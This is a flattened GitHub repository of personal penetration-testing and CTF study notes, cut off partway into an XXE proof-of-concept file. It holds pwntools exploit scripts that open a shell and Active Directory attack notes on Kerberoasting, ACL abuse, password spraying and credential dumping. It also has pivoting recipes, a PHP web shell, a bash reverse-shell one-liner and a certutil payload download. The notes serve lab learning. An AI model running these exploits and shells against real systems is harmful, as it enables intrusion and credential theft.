├── CTF ├── Breach - Vulnlab.pdf ├── Control - Vulnlab.pdf ├── HTB Retired │ └── HTB Retired - Binary Exploitation.pdf ├── interview opportunity │ ├── Interview Opportunity.pdf │ ├── exploit.py │ ├── interview-opportunity │ └── libc.so.6 └── sleigh │ ├── Sleigh.pdf │ ├── exploit.py │ ├── flag.txt │ └── sleigh ├── Methodology ├── Active Directory │ ├── Exploiting ACL's.md │ └── Kerberoasting.md ├── Attacks.md ├── Enumeration.md ├── Images │ ├── fig1.png │ └── fig2.png └── Pivoting.md ├── Miscellaneous ├── The NTLM Protocol & NTLM Relay Attacks.pdf ├── Tricks.md └── XXE Poc │ ├── XXE.pdf │ └── app.py └── README.md /CTF/Breach - Vulnlab.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ToBeatElite/InfoSecNotes/82fff152db2f369f8f66e28643db981e2d235a6f/CTF/Breach - Vulnlab.pdf -------------------------------------------------------------------------------- /CTF/Control - Vulnlab.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ToBeatElite/InfoSecNotes/82fff152db2f369f8f66e28643db981e2d235a6f/CTF/Control - Vulnlab.pdf -------------------------------------------------------------------------------- /CTF/HTB Retired/HTB Retired - Binary Exploitation.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ToBeatElite/InfoSecNotes/82fff152db2f369f8f66e28643db981e2d235a6f/CTF/HTB Retired/HTB Retired - Binary Exploitation.pdf -------------------------------------------------------------------------------- /CTF/interview opportunity/Interview Opportunity.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ToBeatElite/InfoSecNotes/82fff152db2f369f8f66e28643db981e2d235a6f/CTF/interview opportunity/Interview Opportunity.pdf -------------------------------------------------------------------------------- /CTF/interview opportunity/exploit.py: -------------------------------------------------------------------------------- 1 | # ToBeatElite 2 | 3 | from pwn import * 4 | 5 | def main(): 6 | 7 | executable = ELF('interview-opportunity', checksec=False) 8 | context.binary = executable 9 | rop = ROP(executable) 10 | 11 | rop.puts(executable.got.puts) 12 | rop.main() 13 | 14 | #my_process = remote('mc.ax', 31081) 15 | my_process = executable.process() 16 | payload = flat( 17 | b'A' * 34, 18 | rop.chain() 19 | ) 20 | 21 | my_process.sendlineafter(b'DiceGang?', payload) 22 | 23 | my_process.recvlines(3) 24 | puts = unpack(my_process.recvline().strip()[:6].ljust(8, b"\x00")) 25 | log.info(f'puts found at {hex(puts)}') 26 | 27 | libc = ELF('/usr/lib/libc.so.6', checksec=False) 28 | libc.address = puts - libc.symbols.puts 29 | log.info(f'libc base adress found at {hex(libc.address)}') 30 | rop = ROP(libc) 31 | 32 | rop.system(next(libc.search(b'/bin/sh\x00'))) 33 | 34 | payload = flat( 35 | b'A' * 34, 36 | rop.chain() 37 | ) 38 | 39 | my_process.sendlineafter(b'DiceGang?', payload) 40 | log.success('Opening Shell') 41 | my_process.recvlines(3) 42 | my_process.interactive() 43 | 44 | if __name__ == '__main__': 45 | main() 46 | -------------------------------------------------------------------------------- /CTF/interview opportunity/interview-opportunity: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ToBeatElite/InfoSecNotes/82fff152db2f369f8f66e28643db981e2d235a6f/CTF/interview opportunity/interview-opportunity -------------------------------------------------------------------------------- /CTF/interview opportunity/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ToBeatElite/InfoSecNotes/82fff152db2f369f8f66e28643db981e2d235a6f/CTF/interview opportunity/libc.so.6 -------------------------------------------------------------------------------- /CTF/sleigh/Sleigh.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ToBeatElite/InfoSecNotes/82fff152db2f369f8f66e28643db981e2d235a6f/CTF/sleigh/Sleigh.pdf -------------------------------------------------------------------------------- /CTF/sleigh/exploit.py: -------------------------------------------------------------------------------- 1 | # ToBeatElite 2 | 3 | from pwn import * 4 | 5 | def main(): 6 | 7 | context.update(arch='amd64', os='linux') 8 | my_process = process('./sleigh') 9 | 10 | my_process.sendlineafter(b'>', b'1') 11 | my_address = my_process.recvuntil(b'>').split()[9][1:15] 12 | log.info(f'Found Stack Address : {my_address.decode()}') 13 | 14 | shellcode = asm(shellcraft.cat('flag.txt')) 15 | 16 | # padding = b'A' * (72 - len(shellcode)) 17 | padding = b'A' * 28 18 | payload = flat( 19 | shellcode, 20 | padding, 21 | int(my_address, 16) 22 | ) 23 | 24 | my_process.sendline(payload) 25 | log.info('Sending Payload') 26 | my_process.recvline() 27 | 28 | my_process.interactive() 29 | 30 | if __name__ == '__main__': 31 | try: main() 32 | except Exception as my_ex: print(my_ex) 33 | -------------------------------------------------------------------------------- /CTF/sleigh/flag.txt: -------------------------------------------------------------------------------- 1 | FLAG{FlAG_GOES_HERE} 2 | -------------------------------------------------------------------------------- /CTF/sleigh/sleigh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ToBeatElite/InfoSecNotes/82fff152db2f369f8f66e28643db981e2d235a6f/CTF/sleigh/sleigh -------------------------------------------------------------------------------- /Methodology/Active Directory/Exploiting ACL's.md: -------------------------------------------------------------------------------- 1 | ## Notes On ACL's 2 | 3 | ### GenericWrite 4 | 5 | Tie an SPN to the user whom you have *GenericWrite* on, and invoke a *Kerberoast* to get a crackable hash 6 | 7 | ```powershell 8 | # setspn should be available on the DC 9 | 10 | setspn -a MSSQLSvc/:1433 \ -SET @{serviceprincipalname='nonexistent/tobeatelite'} 21 | 22 | # Example 23 | 24 | Set-DomainObject -Identity maria -SET @{serviceprincipalname='nonexistent/tobeatelite'} 25 | ``` 26 | 27 | Check to make sure that the SPN was created successfully. You should see the new SPN and the username in the output. 28 | 29 | ```powershell 30 | Get-NetUser -SPN | select serviceprincipalname 31 | ``` 32 | 33 | If successful: Kerberoast. 34 | 35 | ### ForceChangePassword 36 | 37 | ez pwn 38 | 39 | ```powershell 40 | cd /temp 41 | upload /home/tobeatelite/ctf/tools/PowerView.ps1 42 | . .\PowerView.ps1 43 | $newpass = ConvertTo-SecureString 'Tobeatelite%' -AsPlainText -Force 44 | Set-DomainUserPassword -Identity -AccountPassword $newpass 45 | ``` 46 | 47 | ### WriteOwner 48 | 49 | this is on a group. add yourself to that group and get thier privs 50 | 51 | ```powershell 52 | cd /temp 53 | upload /home/tobeatelite/ctf/tools/PowerView.ps1 54 | . .\PowerView.ps1 55 | 56 | Set-DomainObjectOwner -Identity '' -OwnerIdentity '' 57 | Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All 58 | 59 | TODO 60 | ``` 61 | TODO 62 | -------------------------------------------------------------------------------- /Methodology/Active Directory/Kerberoasting.md: -------------------------------------------------------------------------------- 1 | ## Notes On Kerberoasting 2 | 3 | **Intro - Kerberos Protocol** 4 | 5 | Kerberos is a *Network Authentication Protocol*. It makes use of *tickets* to verifying identities and enabling trusted communications in a network. By default, Kerberos uses UDP port 88. Its often used in Active Directory Environments. 6 | 7 | 8 | 9 | **What is Kerberoasting?** 10 | 11 | Kerberoasting is an attack that allows an attacker to take advantage of how service account leverage and use Kerberos authentication with *Service Principal Names (SPN)*. If the attack is successful, you end up getting hashes of the service account. It does not *exploit* any security loophole, instead you are literally just *abusing* an intended functionality of Kerberos. This attack makes use of the "TGS" Portion of the Kerberos Protocol. 12 | 13 | **What are SPN's?** 14 | 15 | *Service Principal Names* are unique identifier's of a service instance. Kerberos uses SPN's to associate a service instance to a service account. This lets a client request and use a service, without knowing the actual account its being ran on. 16 | 17 | **How does Kerberoasting Work?** 18 | 19 | When we Kerberoast, we are locating Users on the Domain that have *SPN's* tied to them, request a TGS ticket, and creating a crackable hash from the response. 20 | 21 | The attack is done as follows: 22 | 23 | - Send ``TGS-REQ`` to the ``KDC`` for any account that has an *SPN* tied to it. 24 | - Receive the ``TGS-REP`` 25 | 26 | The ``TGS-REP`` will be encrypted with the NTLM Hash of the account the *SPN* is tied to, and so we can use the response to get the hash out of it, which we can then crack offline. 27 | 28 | **When is Kerberoasting Effective?** 29 | 30 | You can only Kerberoast when you have compromised a user on a domain, so it's a good idea to try this attack when you're trying to pivot to a higher privileged account, as service accounts are often misconfigured to be given more power than they would need. Furthermore, you don't need a privileged account to do this attack, any old domain user is fine. 31 | 32 | **Mitigation** 33 | 34 | Kerberoasting can never be fully patched, because, as stated previously, there is nothing being exploited and only abused. You should set very strong passwords for all users with *SPN's* tied to them, and rotate these passwords regularly. In addition to this, do not give your service accounts more privileges than they need, keep their privileges to a minimum. 35 | 36 | 37 | **Resources** 38 | 39 | - [How to Prevent Kerberoasting Attacks](https://www.lepide.com/blog/how-to-prevent-kerberoasting-attacks/) 40 | - [Attacking Active Directory - Kerberoasting](https://www.youtube.com/watch?v=-3MxoxdzFNI) 41 | - [QOMPLX Knowledge: Kerberoasting Attacks Explained](https://www.qomplx.com/qomplx-knowledge-kerberoasting-attacks-explained/) 42 | - Lot's more; there is so much on the Internet on Kerberoasting. 43 | -------------------------------------------------------------------------------- /Methodology/Attacks.md: -------------------------------------------------------------------------------- 1 | ## Miscellaneous Attacks In No Particular Order 2 | 3 | **Password Spraying With CrackMapExec** 4 | 5 | When You have a working password and a list of userames, or a working username and a list of passwords, ``crackmapexec`` makes testing your credentials trivial. ``crackmapexec`` has a few protocols available. 6 | ```bash 7 | # Test 1 Password with a list of Usernames 8 | crackmapexec -u -p '' --continue-on-success 9 | 10 | # Test 1 Username with a list of Passwords 11 | crackmapexec -u '' -p --continue-on-success 12 | 13 | # Authentication with an NT hash 14 | crackmapexec -u -H '' --continue-on-success 15 | ``` 16 | 17 | ## Windows / Active Directory Attacks 18 | 19 | **AS-REP Roasting** 20 | 21 | AS-REP roasting is a technique that allows retrieving password hashes for users that have don't require Kerberos preauthentication. ``impacket`` has a utility that makes this trivial for us. I could only do a bad job explaining this attack, so I've linked much better resources below. It is important to note that this is not found often, if at all, in real world engagements. 22 | 23 | ```bash 24 | python3 GetNPUsers.py / -dc-ip -no-pass -usersfile 25 | ``` 26 | 27 | - [Roasting AS-REPS](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/) 28 | - [AS-REP Roasting](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat) 29 | 30 | **Kerberoasting** 31 | 32 | Kerberoasting is a method for extracting service account credentials from Active Directory as a notmal user. Again, [AD Security](https://adsecurity.org/) has an insane amount of content that goes in depth to what this is, how it works, and when to use it. I won't even bother going into the detail's of the attack here, but articles from them are linked below. 33 | 34 | ``impacket`` has a utility that makes this trivial for us, ``GetUserSPNs.py``. 35 | 36 | 37 | ```bash 38 | # Normal Authentication 39 | python3 GetUserSPNs.py -request -dc-ip /: -save -outputfile hashes.txt 40 | 41 | # Authentication with NT and LM Hashes 42 | python3 GetUserSPNs.py -request -dc-ip -hashes : / -save -outputfile hashes.txt 43 | ``` 44 | 45 | You can also use the PowerView function if you already have a shell. 46 | 47 | ```powershell 48 | Import-Module .\PowerView.ps1 49 | Invoke-Kerberoast 50 | ``` 51 | 52 | - [Cracking Kerberos TGS Tickets Using Kerberoast](https://adsecurity.org/?p=2293) 53 | - [Dectecting Kerboasting Activity](https://adsecurity.org/?p=3458) 54 | - [Kerberos Overview](https://adsecurity.org/?p=227) 55 | 56 | **SCF File Attack** 57 | 58 | An SCF *(Shell Command File)* can be used to access an attacker's UNC path. Planted inside a network share, when a user opens the ``scf`` file, Windows automatically authenticates to the server the UNC is pointing to, using the current user's credentials. We can use ``responder`` or something similar to harvest these credentials and crack them offline. 59 | 60 | 1) Inside a ``.scf`` file put: 61 | 62 | ``` 63 | [Shell] 64 | Command=2 65 | IconFile=\\\share\test.ico 66 | [Taskbar] 67 | Command=ToggleDesktop 68 | ``` 69 | 70 | [This tool](https://github.com/xct/hashgrab) is great for making payloads to capture hashes. 71 | 72 | This attack is also very useful because It lets us relay things because it gives us a middle position between a User & a Service. 73 | - [The NTLM Protocol & NTLM Relay Attacks](https://github.com/ToBeatELIT3/InfoSecNotes/blob/main/Miscellaneous/The%20NTLM%20Protocol%20%26%20NTLM%20Relay%20Attacks.pdf) 74 | 75 | 2) Run [responder](https://github.com/lgandx/Responder) locally 76 | 77 | ```bash 78 | responder -I 79 | ``` 80 | 81 | 3) Put your ``.scf`` file on a share and wait for a user to open it. 82 | 83 | - [SMB Share – SCF File Attacks](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) 84 | - [Stealing Windows Credentials Using Google Chrome](https://www.defensecode.com/whitepapers/Stealing-Windows-Credentials-Using-Google-Chrome.pdf) 85 | 86 | **Secrets/Credentials Dumping** 87 | 88 | The impacket script ``secretsdump.py`` can be used to extract credentials and secrets from a system. There are 2 main use cases: 89 | - Dump NTLM hash of local users (remote SAM dump) 90 | - Extract Domain Credentials via *DC Sync* 91 | 92 | There is a lot that can be explained on *how* this works, and *where* this works; but this is mainly so I can remember tool syntax so I won't bother with going into those details. 93 | 94 | ```bash 95 | python3 secretsdump.py /:@ -outputfile secretsdump 96 | ``` 97 | 98 | - [DC Sync Attacks With Secretsdump](https://www.youtube.com/watch?v=QfyZQDyeXjQ) 99 | - [Secretsdump Demystified](https://medium.com/@benichmt1/secretsdump-demystified-bfd0f933dd9b) 100 | 101 | **Username Enumeration** 102 | 103 | Enumerate valid usernames using ``kerbrute``. This requires Kerberos to the open. 104 | 105 | ```bash 106 | kerbrute userenum -d --dc 107 | ``` 108 | 109 | **Valid User Testing** 110 | 111 | Input fiie should have username:password pairs in them. 112 | 113 | Example: 114 | 115 | ``` 116 | admin:admin 117 | KThompson:SecretPassw0rd 118 | SWall:Lol123! 119 | ``` 120 | 121 | ```bash 122 | kerbrute bruteforce --dc 10.129.83.46 -d scrm.local pairs.txt 123 | ``` 124 | -------------------------------------------------------------------------------- /Methodology/Enumeration.md: -------------------------------------------------------------------------------- 1 | ## General Enumeration 2 | 3 | **SMB - 445** 4 | 5 | With SMB open we can look for shares that have anonymous access enabled, so that we can view any files inside them that may help us move forward. 6 | 7 | ``smbmap`` is a great tool to check what shares you have access to, if any. Try all of these, they can yeild different results 8 | 9 | ```bash 10 | smbmap -R -H # With No Creds 11 | smbmap -R -H -u 'invalid' 12 | smbmap -R -H -u 'invalid' -p 'invalid' 13 | ``` 14 | 15 | **Useful Enumeration Commands** 16 | 17 | ```bash 18 | # SMB Connection 19 | smbclient \\\\\\ -N # With No Creds 20 | smbclient \\\\\\ -U % 21 | # SMB Enumeration with Credentials 22 | smbmap -R -H -d -u -p 23 | ``` 24 | 25 | Appending ``-c 'recurse;ls' `` to the end of an ``smbclient`` command, will recursivly list every item in the entire share, useful for rapidly going through large shares for information. 26 | 27 | **Useful SMB Commands** 28 | 29 | ```bash 30 | # Download Everything in Directory 31 | 32 | > prompt off 33 | > mget * 34 | ``` 35 | 36 | **FTP - 21** 37 | 38 | The File Transfer Protocol is used to transfer files between clients and a server. The most you can really do with this for enumeration is look for anonymous access. 39 | 40 | Anonymous FTP Connection 41 | 42 | ```bash 43 | ftp 44 | > anonymous 45 | > anonymous 46 | ``` 47 | 48 | **Useful FTP Commands** 49 | 50 | ```bash 51 | # Download Everything in Directory 52 | 53 | > passive 54 | > binary 55 | > prompt off 56 | > mget * 57 | ``` 58 | 59 | ## Windows / Active Directory Enumeration 60 | 61 | ### Important Ports 62 | 63 | **LDAP - 389, 636** 64 | 65 | You can query LDAP to get lots of imformation on a Domain. Usernames, Groups, Domain Names, etc etc. Somtimes there are passwords or other confidential information inside the data and you can access it. ``ldapsearch`` is a great tool to make these queries. 66 | 67 | ```bash 68 | ldapsearch -x -H ldap:// -b '' 69 | 70 | # Examples 71 | 72 | ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' 73 | ldapsearch -x -H ldap://10.10.10.6 -b 'CN=Joe Clark,OU=it,DC=evilcorp,DC=local' 74 | ``` 75 | 76 | These are some other tools you may want to use. 77 | 78 | An excellent NSE script for ``nmap`` that lets us see the anonymous information available. 79 | 80 | ```bash 81 | nmap -Pn -p 389 -sV --script "ldap* and not brute" 82 | ``` 83 | 84 | You can use [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) to get an overview of users, groups, computers, policies in the domain. You will get better results with credentials, rarely is anonymous access allowed. 85 | 86 | ```bash 87 | ldapdomaindump 88 | 89 | # With Authentication 90 | ldapdomaindump -u '\' -p '' -o ./ldapdump 91 | ``` 92 | 93 | **MSRPC - 135, 593** 94 | 95 | If we have access to RPC, we can use it to get a lot of potentially useful information, including usernames, passwords, domain information. 96 | 97 | ```bash 98 | rpcclient -U '' -N 99 | rpcclient -u '' --password='' 100 | ``` 101 | 102 | **Useful RPC Commands** 103 | 104 | ```bash 105 | > querydominfo # Domain Information 106 | > enumdomusers # All Domain Users 107 | > enumdomgroups # All Domain Groups 108 | > querydispinfo # Extensive Information On Users 109 | ``` 110 | 111 | I could go on and on, but this article is *insanely* good at helping you get information when you have RPC access. 112 | 113 | - [Enumerating Active Directory with RPC](https://www.hackingarticles.in/active-directory-enumeration-rpcclient/) 114 | 115 | ### Noteworthy Ports 116 | 117 | **WinRM - 5985** 118 | 119 | WinRM, or "Windows Remote Management" and is a service that lets Admin's perform management tasks on systems remotely. It's sort of like SSH. 120 | 121 | If the service is open and you have a valid pair of credentals you found somwhere, maybe they were for SMB or maybe you found them by enumerating RPC, Always Check to see if you can login using ``evil-winrm`` to get a shell. If you get your hands on an NT hash, try connecting with it too. 122 | 123 | ```bash 124 | evil-winrm -i -u '' -p '' # Using Creds 125 | evil-winrm -i 10.10.10.192 -u '' -H '' # Using NT Hash 126 | ``` 127 | 128 | **Kerberos - 88** 129 | 130 | having Kerberos present means that its a DC. you can do AD Attacks like Kerberoasting or AS REP Roasting; this port should be noted but there is nothing to really enumerate from it. 131 | -------------------------------------------------------------------------------- /Methodology/Images/fig1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ToBeatElite/InfoSecNotes/82fff152db2f369f8f66e28643db981e2d235a6f/Methodology/Images/fig1.png -------------------------------------------------------------------------------- /Methodology/Images/fig2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ToBeatElite/InfoSecNotes/82fff152db2f369f8f66e28643db981e2d235a6f/Methodology/Images/fig2.png -------------------------------------------------------------------------------- /Methodology/Pivoting.md: -------------------------------------------------------------------------------- 1 | # Notes on Pivoting 2 | 3 | Notes I've taken while doing the [Containers & Pivoting Track](https://app.hackthebox.com/tracks/Containers-and-Pivoting) on HackTheBox. 4 | 5 | --- 6 | 7 | ## Important Tools 8 | 9 | - **[Static Nmap](https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap)** 10 | - used for enumerating hosts our maachine cannot access 11 | - its faster than scanning through a Socks Proxy 12 | 13 | - **[Static Socat](https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat)** 14 | - lets us forward ports 15 | - lets us catch incoming shells 16 | 17 | - **[Static Netcat](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/ncat)** 18 | - you know what it does 19 | 20 | - **[Chisel](https://github.com/jpillora/chisel/releases)** 21 | - lets us create a client for our Socks Proxies 22 | 23 | - **[FoxyProxy](https://addons.mozilla.org/en-CA/firefox/addon/foxyproxy-standard/)** 24 | - Most people already use this; I didnt 25 | - used to swap between different proxies 26 | - handy when we have multiple socks proxies to juggle 27 | 28 | --- 29 | 30 | ## Socks Proxies 31 | 32 | Socks *(Socket Secure)* is a network protocol that allows communication to a server *through* a firewall, by routing network traffic to the server, the bahalf of the client. It can route *any* type of traffic, regardless of prolocol. We use ``proxychains`` on linux to route commands through this chain, but we must create the socks connection first. 33 | 34 | **Use Cases:** 35 | 36 | If we find a vulnerable service that is inaccessable to our local machine, and we cannot exploit from a comprimised machine for lack of tools, we create a socks proxy from our local machine to the comprimised one, so we can run our exploit from the local one and have it reach the vulnerable, previously inaccessable one. 37 | 38 | Using a socks proxy to explore an inaccessable subnet, from the confort of our own machine. Not *really* useful since there will be better ways to do that, but fun nevertheless. 39 | 40 | Common Methods of achiveing connection: 41 | Where ```` is the port we want our proxy to listen on: 42 | 43 | **SSH** 44 | 45 | ```bash 46 | ssh -D user@host 47 | 48 | # Example: 49 | 50 | ssh -D 1080 kaneki@ghoul.htb -i loot/kaneki-id_rsa 51 | ``` 52 | **Chisel** 53 | 54 | If you have a shell on a host, but no ssh access, but can access your own (or a comprimised) machine, you can use Chisel 55 | 56 | ```bash 57 | # On our controlled machine: 58 | 59 | chisel server -p --reverse 60 | 61 | # On target machine: 62 | # Where is the IP of our controlled machine 63 | 64 | chisel client : R:socks 65 | ``` 66 | ```bash 67 | # Example: 68 | # create socks proxy on port 1080 of local machine, to give tunneling access into 10.10.10.2: 69 | 70 | tobeatelite@10.10.10.1 $ chisel server -p 1080 --reverse # Local machine 71 | user1@10.10.10.2 $ ./tmp/chisel client 10.10.10.1:1080 R:socks # Machine to tunnel 72 | 73 | ``` 74 | 75 | **Meterpreter / Metasploit** 76 | 77 | If you have a meterpreter shell, you can set up an autoroute to the subnets you want, and then can use an auxilary module to create a socks proxy. 78 | 79 | ```bash 80 | meterpreter > run autoroute -s 172.90.0.0/16 # I want access to this subnet 81 | meterpreter > background 82 | 83 | msf6 > use auxiliary/server/socks_proxy 84 | msf6 > set srvport 85 | msf6 > run 86 | ``` 87 | 88 | **Using Proxychains** 89 | 90 | Simply use the ``proxychains`` command after establishing a socks proxy. You must provide a config file, otherwise it will default to ``/etc/proxychains.conf``. 91 | 92 | This is an example config, to route all network traffic entering through a socks proxy on our local port 1083 93 | 94 | ``` 95 | [ProxyList] 96 | socks5 127.0.0.1 1083 97 | ``` 98 | 99 | ```bash 100 | # Examples 101 | 102 | # Using Custom Config 103 | proxychains -q -f config_1083.conf nmap -F 172.19.0.2 104 | 105 | # Using Default Config 106 | proxychains -q python3 exploit.py 172.19.0.3 8000 107 | ``` 108 | 109 | --- 110 | 111 | ## Port Forwarding 112 | 113 | **Socat** 114 | 115 | Local Forwarding 116 | 117 | ```bash 118 | ./socat tcp-listen:,fork tcp:: & 119 | 120 | # Example: 121 | # Forward Traffic from 127.0.0.1:1234 to 10.10.14.25:9876 122 | ./socat tcp-listen:1234,fork tcp:10.10.14.25:9876 & 123 | ``` 124 | 125 | **Meterpreter / Metasploit** 126 | 127 | Local Forwarding 128 | ```bash 129 | meterpreter > portfwd add -l -r -p 130 | 131 | # Example: 132 | # Forward Traffic from 127.0.0.1:9009 to 10.10.14.25:8008 133 | 134 | meterpreter > portfwd add -l 9009 -r 10.10.14.25 -p 8008 135 | ``` 136 | 137 | **SSH** 138 | 139 | Local Forwarding 140 | 141 | With SSH, its nice to use SSH Control Sequences to do multiple forwards, in comparision to haveing multiple Connections open with 1 forward each. To access it, hit ``Enter``, and then type ``~C``. Then you can forward ports. 142 | 143 | ```bash 144 | # After entering the SSH prompt via instructions above: 145 | 146 | ssh > -L :: 147 | 148 | # Example: 149 | # Forward Traffic from 127.0.0.1:8008 to 10.10.14.25:80 150 | 151 | ssh > -L 8080:10.10.14.25:80 152 | ``` 153 | 154 | I think using socks proxies is better than forwarding ports one by one, but its a case-by-case basis I guess. More details in the *Scenarios* Section 155 | 156 | --- 157 | 158 | ## Listeners 159 | 160 | Listening for reverse shells or anything like that. Once you're a few hops inside a network, ``nc`` may not be available to catch shells, and you may want to / have to listen for connections on a comprimised machine. Socat has us covered 161 | 162 | **Socat** 163 | 164 | ```bash 165 | ./socat tcp-listen: stdout 166 | 167 | # Example: 168 | # Listen for reverse shell on port 2956 169 | 170 | ./socat tcp-listen:2956 stdout 171 | ``` 172 | 173 | **Netcat** 174 | 175 | You know how to do it. 176 | 177 | --- 178 | 179 | ## File Transfers 180 | 181 | We need to get our tools onto our targets: executables, scripts, etc. Start by Looking for somthing to connect to our web server with; python, perl, wget, curl, etc. Any one will do. 182 | 183 | **Netcat** 184 | 185 | ```bash 186 | # Serve and Recive files using 187 | nc -lnvp < 188 | nc > 189 | ``` 190 | ```bash 191 | # Example: 192 | # Transfer deepce.sh from 10.10.10.1 to 10.10.10.2 193 | 194 | tobeatelite@10.10.10.1 $ nc -lnvp 9080 < ~/tools/deepce.sh 195 | user1@10.10.10.2 $ ./tmp/nc 10.10.10.1 9080 > deepce.sh 196 | ``` 197 | 198 | **Meterpreter / Metasploit** 199 | 200 | ```bash 201 | meterpreter > upload 202 | 203 | # Example: 204 | # Upload deepce.sh to /tmp/tobeatelite/deepce.sh 205 | 206 | meterpreter > upload ~/tools/deepce.sh /tmp/tobeatelite/ 207 | ``` 208 | 209 | --- 210 | 211 | ## Methodologies 212 | 213 | Things to do once you've gained a shell inside a host, with intent to pivot forward. 214 | 215 | - View network interfaces: 216 | - Any new subnets available to you? Take note if so. 217 | - If you dont have a command to find them, try reading ``/proc/net/arp``. 218 | 219 | - Discover new hosts: 220 | - Run a ping sweep on new subnets. 221 | - ``for i in $(seq 1 254); do (ping -c 1 X.X.X.$i | grep "bytes from" | cut -d':' -f1 | cut -d' ' -f4 &); done`` 222 | - nmap works aswell: ``./nmap -sP X.X.X.X/16``. 223 | - Use nmap to see if you can access any new services on previous hosts from the "inside" of the network. 224 | - check for recent connections. ``arp -a`` 225 | - Enumerate new hosts: 226 | - Use nmap via upload, or establish a socks proxy to the host. 227 | - nmap will run faster if its uploaded, socks proxy will slow it down. 228 | 229 | - Enumerate current host with the usual techniques. 230 | 231 | - Think Better. 232 | 233 | --- 234 | 235 | ## Scenarios 236 | 237 | The multiple IP's in the image represent different network interfaces. 238 | 239 | **Scenario 1: Get Access to Service 3 Hosts Away** 240 |
241 | Visual 242 | 243 |
244 | 245 | Assume theres important services on ``172.8.0.9`` that we want to view. We need to create a socks proxy to ``172.14.0.5`` so that we can use a proxychain to access the services on ``172.8.0.9``. We have SSH access on ``172.12.0.4``. 246 | 247 | To start, we'd get a socks proxy on ``10.10.0.12`` 248 | 249 | ```bash 250 | tobeatelite@10.10.0.25 $ chisel server -p 1080 --reverse 251 | user@172.12.0.2 $ ./tmp/chisel client 10.10.0.25:1080 R:socks 252 | ``` 253 | And now we can get a socks proxy on ``172.14.0.3`` with ssh, tunneling through ``172.12.0.2`` 254 | 255 | ```bash 256 | proxychains -q -f config_1080.conf ssh -i id_rsa user2@172.12.0.4 -D 1081 257 | ``` 258 | 259 | 260 | 261 | **Scenario 2: Receive Revshell through 2 Hosts** 262 |
263 | Visual 264 | 265 |
266 | 267 | In this case, we have RCE on ``172.14.0.5`` and want a reverse shell. It's probobly not a good idea to recive the reverse shell on our connections with ``172.12.0.2`` or ``172.14.0.3``, because those would probobly also be reverse shells and we want to keep that connection open for us. What we do is simply use socat on the comprimised hosts to tunnel all traffic from a port, back to a netcat listener on ``10.10.0.25``. 268 | 269 | ```bash 270 | user@172.14.0.3 $ ./tmp/socat tcp-listen:1234,fork tcp:172.0.12.2:1234 & 271 | --- 272 | user@172.12.0.2 $ ./tmp/socat tcp-listen:1234,fork tcp:10.10.0.25:1234 & 273 | --- 274 | tobeatelite@10.10.0.25 $ rlwrap -cAr nc -lnvp 1234 275 | ``` 276 | 277 | The tunnel is set up, and by using our RCE, we can send a reverse shell to ``172.14.0.3:1234``, have it tunnel to ``172.0.12.2:1234``, which will tunnel to ``10.10.0.25:1234``, and we will have a shell on our machine. Super simple principle. 278 | -------------------------------------------------------------------------------- /Miscellaneous/The NTLM Protocol & NTLM Relay Attacks.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ToBeatElite/InfoSecNotes/82fff152db2f369f8f66e28643db981e2d235a6f/Miscellaneous/The NTLM Protocol & NTLM Relay Attacks.pdf -------------------------------------------------------------------------------- /Miscellaneous/Tricks.md: -------------------------------------------------------------------------------- 1 | in here is things i have copy pasted since i have to look for them way too often, i take no credit for anything btw 2 | 3 | ### bash reverse shell from a php command thing 4 | 5 | When you have one of these uploaded: 6 | 7 | ```php 8 | 9 | ``` 10 | 11 | and need a revshell. 12 | 13 | ```bash 14 | curl http://10.10.10.101/cmd.php --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'" 15 | ``` 16 | 17 | ### SSTI Fuzzing string 18 | 19 | stolen from hacktricks bc i use it often and it takes me forever to find it each time 20 | ``` 21 | ${{<%[%'"}}%\ 22 | ``` 23 | 24 | ### Certutil File Download 25 | 26 | stolen from ired.team. i forgor this one way too much aswell 27 | 28 | ```powershell 29 | certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe 30 | ``` 31 | 32 | ### smberver commands 33 | 34 | ```bash 35 | 36 | # accept specific auth 37 | smbserver.py -smb2support -username -password 38 | smbsever.py -smb2support POSTEXP /home/tobeatelite/ctf/tools/privesc -username tbe -password tbe 39 | 40 | # anon access 41 | smbserver.py 42 | smbserver.py POSTEXP /home/tobeatelite/ctf/tools/privesc 43 | 44 | ``` 45 | 46 | Meterpreter auto migrate 47 | ``` 48 | meterpreter > run post/windows/manage/migrate 49 | ``` 50 | 51 | enter docker container 52 | 53 | ``` 54 | docker exec -it bash 55 | ``` 56 | 57 | rsync list 58 | ``` 59 | rsync --list-only -a rsync://unbalanced.htb/ 60 | ``` 61 | 62 | rsync file getter things 63 | ``` 64 | rsync -a rsync://unbalanced.htb/conf_backups conf_backups 65 | rsync -a rsync:/// 66 | ``` 67 | 68 | remove comments from file 69 | ``` 70 | cat config.yml | grep -vE "^#" | grep . 71 | ``` 72 | -------------------------------------------------------------------------------- /Miscellaneous/XXE Poc/XXE.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ToBeatElite/InfoSecNotes/82fff152db2f369f8f66e28643db981e2d235a6f/Miscellaneous/XXE Poc/XXE.pdf -------------------------------------------------------------------------------- /Miscellaneous/XXE Poc/app.py: -------------------------------------------------------------------------------- 1 | # ToBeatElite 2 | 3 | from flask import 